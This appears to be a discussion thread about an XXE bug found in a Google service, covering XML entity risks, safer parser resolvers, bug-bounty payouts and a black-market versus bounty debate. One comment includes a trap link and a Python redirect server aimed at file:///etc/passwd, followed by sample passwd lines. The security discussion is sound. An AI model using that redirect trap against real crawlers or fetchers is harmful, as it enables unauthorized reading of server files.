This is an exemplary response from Google. They respond promptly (with humor, no less) and thank the guys that found the bug. Then they proceeded to pay out a bounty of $10,000.
Well done, Google.
Am I missing part of the story?
So anyone can create a trap link such as
<a href="file:///etc/passwd">gold</a>
Or <a href="trap.html">trap</a>
once trap.html is requested, the server issues a header "Location: file:///etc/passwd". Then it's just a matter of sitting and waiting for the result to show up wherever that spider shows its indexed results.
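A minimal sketch of the trap described above (the handler name and port are mine, not from the write-up): a web server whose crawled page answers with a redirect into the local filesystem. Whether anything leaks depends entirely on the fetcher being willing to follow a redirect across URL schemes into file://.

```python
# Sketch only: a server whose /trap.html response redirects a
# URL fetcher to a local file. A fetcher that follows redirects
# across schemes would read /etc/passwd instead of a web page.
from http.server import BaseHTTPRequestHandler, HTTPServer

class TrapHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/trap.html":
            self.send_response(302)
            self.send_header("Location", "file:///etc/passwd")
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the demo quiet

def serve(port=8000):
    # Illustrative entry point; the port is arbitrary.
    HTTPServer(("", port), TrapHandler).serve_forever()
```

A sane fetcher refuses non-http(s) redirect targets outright; the bug class exists only because some don't.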
This should scare anyone who has ever left an old side project running; I could see a lot of companies doing a product/service portfolio review based on this as a case study.
Even better, host on your competitor's servers.
Works for small, old, etc. products, as the value of a breach will probably be less than the value of the bounty + cred.
They also discovered vulnerabilities in many big websites (Dropbox, Facebook, Mega, ...). Their blog also has many great write-ups: http://blog.detectify.com/
It's too much hidden power in the hands of those who don't know what they're doing (loading external entities pointed to in an XML document automatically? What kind of joke is that?)
Your browser does much the same when parsing (X)HTML. LaTeX naturally includes ‘external’ resources when building an output file. There are tons of examples like that, loading external entities per se is not wrong, it’s mostly just wrong under these specific circumstances.
This compared to XML parsers, for which there are often multiple per language, each of which may be implemented to wildly different levels of sophistication re: security.
To quote Phil Wadler's paper about XML, where he established some of the principles that influenced XQuery: "So the essence of XML is this: the problem it solves is not hard, and it does not solve the problem well."[1]
I suggest reading the entire paper; it shows a number of shortcomings, but it's also rather enlightening about how XML actually is structured, and how its semantics are defined. (i.e., in spite of that quote, it's not just XML bashing)
[1]http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.109...
What I don't agree with is that it allows a "load this" where this can be a local file, a URL in some cases, basically anything.
Where would we be if web browsers couldn't use external resources?
General-purpose parsers/renderers need to have tightly locked down, sensible defaults, or even security-oriented feature subsets, but that doesn't mean we should remove one of their most useful features altogether, or avoid them because they're powerful and dangerous.
XML - It seemed like a good idea at the time
"XML is simply lisp done wrong." — Alan Cox
but the gee-whizzery won.
"XML combines the efficiency of text files with the readability of binary files" — unknown
"XML is a classic political compromise: it balances the needs of man and machine by being equally unreadable to both." — Matthew Might
Anyone remember XHTML ?
The pricing model has apparently worked so far. Are there any active users of Detectify here who can share their experience?
Nice to know about such things :-)
Reading the spec that led to the implementations can often reveal interesting things, like support for external entities.
They could also provide a canned resolver which hits the local filesystem and/or the web, which programmers could supply if they wanted, but this should not be a default. The programmer should have to explicitly specify that access.
I've had related problems where XML parsers would try to go off and fetch DTDs from the web, then fail, because they were running on firewalled machines that couldn't see the servers hosting the DTDs. That took us by surprise. We installed an entity resolver that looked in a local cache of DTDs instead, which was fairly easy. But I would prefer not to have been surprised.
Also, all this stuff should be running in a jail where it can't even see any interesting files, of course.
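The local-cache resolver described above can be sketched with the stdlib SAX API (the cache path and the exact refusal behavior are my illustration; note also that modern Python's SAX parser no longer fetches external entities unless the relevant features are explicitly enabled):

```python
import os
import xml.sax

class LocalOnlyResolver(xml.sax.handler.EntityResolver):
    """Serve DTDs from a local cache; never go to the network."""

    def __init__(self, cache_dir):
        self.cache_dir = cache_dir

    def resolveEntity(self, publicId, systemId):
        # Map the remote system id onto a file in the local cache.
        cached = os.path.join(self.cache_dir, os.path.basename(systemId))
        if os.path.exists(cached):
            return cached
        # Refuse anything we don't have instead of fetching it.
        raise xml.sax.SAXException("blocked external entity: %s" % systemId)

# Hypothetical wiring; /var/cache/dtds is a made-up path.
parser = xml.sax.make_parser()
parser.setEntityResolver(LocalOnlyResolver("/var/cache/dtds"))
```

Failing loudly on a cache miss, rather than falling back to the web, is exactly what turns "mysterious slowdown when a DTD host disappears" into an immediate, debuggable error.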
Then the programmers would most probably write their own resolvers with even more bugs. You would have 10,000 broken implementations of that code, half of them copied from a Stack Overflow example with security left as an exercise for the reader.
But the number of times I've seen production apps that turn out to request DTDs or schemas from remote servers behind the scenes has made that one of the first things I check if I'm tasked to maintain or look into anything that parses XML. Often these apps stop working or slow down for seemingly no reason because the DTD or schema becomes unavailable, and nobody understands why.
One really interesting aspect of this is that many applications suddenly broke when the Republicans shut down the government last year because a number of XML schemas are managed by government agencies who were suddenly legally unable to provide their normal web services:
http://gis.stackexchange.com/a/73777 http://forums.arcgis.com/threads/94294-Expected-DTD-markup-w... http://www.catalogingrules.com/?p=77
Makes me wonder whether it's time to start contributing patches to disable bad ideas like this by default — some places are clearly paying a significant amount to serve content nobody should need: http://www.w3.org/blog/systeam/2008/02/08/w3c_s_excessive_dt...
twic is right that one should always use entity resolvers that point to local resources and that parsers should run in a sandbox without external access.
He's also right to say that by default parsers shouldn't go fetch external resources; I think the reason is historical: entity resolvers appeared later than the parsers themselves.
When I first noticed that HTML doctypes have URLs in them, I inquisitively tried accessing them, and it brought up a lot of questions in my mind about why it was designed that way, what would happen if the URLs no longer existed, etc. Such an explicit external dependency just didn't feel right to me. Unfortunately most people either don't notice or seem to ignore these things...
Interestingly enough, not all XML parsers support external entities; the first one to come to mind is this: http://tibleiz.net/asm-xml/introduction.html
Why would you write code to parse XML?
Use an existing parser to parse.
Use XSLT to modify/transform (including generate JSON/CSV/other).
XML is for some reason a super-controversial technology that is apparently almost universally hated, and XSLT even more so. I hope I won't be downvoted even more for asking: what's scary about being downstream from a (serious, well-maintained) XML parser?
(And I love XSLT. What can I say.)
Input from potentially malicious users should be in the simplest, least powerful of formats. No logic, no programmability, strictly data.
I'm putting "using XML for user input" in the same bucket as "rolling your own crypto/security system". That is, you're gonna do it wrong, so don't do it.
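A concrete version of the "strictly data" rule, assuming the input really can be modeled as plain records: accept JSON, which has no entities, DTDs, or include mechanisms, so a parse can never trigger a fetch.

```python
import json

# JSON parsing is only ever parsing: entity-like syntax in the
# payload stays an inert string instead of triggering a lookup.
untrusted = '{"user": "mallory", "note": "&xxe; does nothing here"}'
record = json.loads(untrusted)
print(record["note"])  # the literal text; nothing is resolved
```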
Actually dug it when I read it a few years ago, and it's awesome knowing that it was probably used for this reply :)
Owasp is also a good resource for learning: https://www.owasp.org/index.php/Main_Page
You can see the general payout levels here: http://www.google.com/about/appsecurity/reward-program/ . Normally the top payout is about $20,000, though for the top payout (for Chrome), 2 people have currently been rewarded with $60,000. There is an overview of the top payouts here: http://www.chromium.org/Home/chromium-security/hall-of-fame.
Some payouts are $1337, $3133.7 or $31336 :P
Microsoft even rewards up to $100,000 for security issues in the latest OS (currently Windows 8.1).
root:x:0:0:root:/:/bin/sh
bin:x:1:1:bin:/dev/null:/sbin/nologin
nobody:x:99:99:nobody:/dev/null:/sbin/nologin
app:x:100:100:app:/app:/bin/sh

They were useful for document editing use cases - remember, this was before SOAP and XML serialization, and SGML tooling that already supported this stuff existed. You can see the record of the decision here: http://www.w3.org/XML/9712-reports.html#ID5
Getting the source?
I guess it's possible you could find a computer that hosted both search and the codebase. But, since search is external and the codebase is internal, I'd bet that they don't share clusters.
"Sir, I am sorry to inform you that another backdoor has been found. We will introduce two more as agreed upon in our service level agreement."
This sells for at least 10 times more on the black market. Why would one rationally choose to "sell" this to Google instead of the black market?
Some people don't break the law because they are afraid to get caught, but I like to believe that most people don't break the law because of the moral aspect. To me at least, selling this on the black market poses no moral questions, so, leaving aside "I'm afraid to get caught", why would one not sell this on the black market? Simple economic analysis.
Very serious question.
* It fits into nobody's existing operational framework (no crime syndicate has a UI with a button labeled "read files off Google's prod servers")
* A single patch run by a single organization kills it entirely
* The odds of anyone, having extended access and pivoted into Google's data center, keeping that access are zero.
I'm not an authority on how much the black market values dumb web vulnerabilities but my guess on a black market price tag for this bug is "significantly less than Google paid".
Later: I asked a friend. "An XXE in a single property? Worthless. And at Google? Worth money to Google. Worth nothing to anybody else."
- How will you launder the money? Alternatively, how will you spend it on the black market? You can't buy houses, cars or stocks with black money.
- Will you get paid? Secure, anonymous, guaranteed payments are not trivial. I don't know if there are escrow services for the black market, but this is definitely risky. We are talking about shady actors, after all.
- Will you get caught? If you do, you will probably end up in prison.
When you take the above into consideration, I think most people would prefer $10,000 legitimate US dollars without risk to $100,000 that might end up giving you ten years behind bars.
Mind you, your point is certainly valid if this were a random hacker type.
If you manage to sell this on the black market, that money is worth half when turned into "legit" money that you can spend. And if we leave aside "I'm afraid to get caught", do we only mean caught by the justice system? What would happen if you sell your exploit to some cybermob and a few days later some monkey on a typewriter finds your exact exploit and publishes it online? Is it not your problem that it is now worthless and some mob feels you sold them crappy gear?
As for the moral aspect. Think of anyone you hold in high regard, or have a loving relationship with. Selling an exploit that will be used for harm, might mean harm to those you hold dear.
Then there is this simmering thing in your subconscious. Some know how to put out that fire. Others wake up in a sweat years later, after a dream where their exploit is used to find and execute a political dissident. That is: you may very well come to regret a "bad" deed in the future, when your situation and responsibilities change. You won't lie on your deathbed and think: "I wish I hadn't built that school, but taken the money and put a down payment on my new bathroom."
Because it is wrong to harm others for personal benefit?
In business, morality is a luxury that some companies can't afford and most choose not to have, so it shouldn't be expected.
The only thing preventing you from selling it on the black market is the potential fame and business you may get by being able to reveal your find which may or may not be worth it.
That 10k is not really much of an incentive from a business perspective.
But I agree with you that $10,000 doesn't sound like much, for such an exploit, and for a company like Google.
Edit: corrected typo "$10" -> $10k.
2. I'm assuming your basis for "no moral questions" is that you'd be hurting Google, which is a corporation, not a human, and can therefore be treated with a different set of moral values. (If this assumption is incorrect, you need to clarify.) However, selling this exploit on the black market may very well be leveraged to affect a lot more people than just Google. People that will be phished, scammed and extorted. That (I hope) does pose moral questions, doesn't it?
The problem is, you can't sell an exploit on the black market on the condition that it may only be used to (say) "steal from the rich and incorporated".
3. Finally, $100k earned on the black market is not worth the same as if it were legitimate, because it is very hard to spend. I can imagine that laundering it could easily knock 50% off the value, as well as taking a lot of time and effort. Then you've got $50k, which is already a lot closer to $10k.
That's probably a reflection of your own morals. There are millions of people that could be affected by this bug, so I'm not sure how there isn't a moral question here.
Exactly because of that. One is legal, the other is not.
If they sold it on the black market, they couldn't brag to anyone that they hacked Google.
You should include damage to the company's reputation, should this get leaked. Especially since they work with security - and who would trust their security to people who sell vulnerabilities to the highest bidder?
This could cost them much more than your quote.
As long as Google is willing to negotiate, I don't see a problem with a group being satisfied with 10k and taking it.
Bounties are always awarded after the bug is disclosed[1].
We constantly[2] upgrade the bounties whenever we feel like we should be paying more, and we will continue to do so. We also increase the rewards from the amounts in the price list if we think they result in a higher impact than what the reporter originally suspected.
We aren't actually trying to out-pay the black market. Overall, our goal is to reward the security community for their time and help with security research, since we both share the same goal of keeping all of us safe (either Google services, or open source/popular software[3]).
And if you are interested, you can follow news on Google's VRP here: https://plus.google.com/communities/103663928590757646624
[1] http://www.google.com/about/appsecurity/reward-program/
[2] http://googleonlinesecurity.blogspot.com/2010/11/quick-updat... http://googleonlinesecurity.blogspot.com/2010/11/rewarding-w... http://googleonlinesecurity.blogspot.com/2012/02/celebrating... http://googleonlinesecurity.blogspot.com/2012/04/spurring-mo... http://googleonlinesecurity.blogspot.com/2013/08/security-re... http://googleonlinesecurity.blogspot.com/2013/06/increased-r... http://googleonlinesecurity.blogspot.com/2014/02/security-re...
[3] http://googleonlinesecurity.blogspot.com/2007/10/auditing-op... http://googleonlinesecurity.blogspot.com/2011/08/fuzzing-at-... http://googleonlinesecurity.blogspot.com/2013/10/going-beyon... http://googleonlinesecurity.blogspot.com/2013/11/even-more-p... http://googleonlinesecurity.blogspot.com/2014/01/ffmpeg-and-... http://www.google.com/about/appsecurity/research/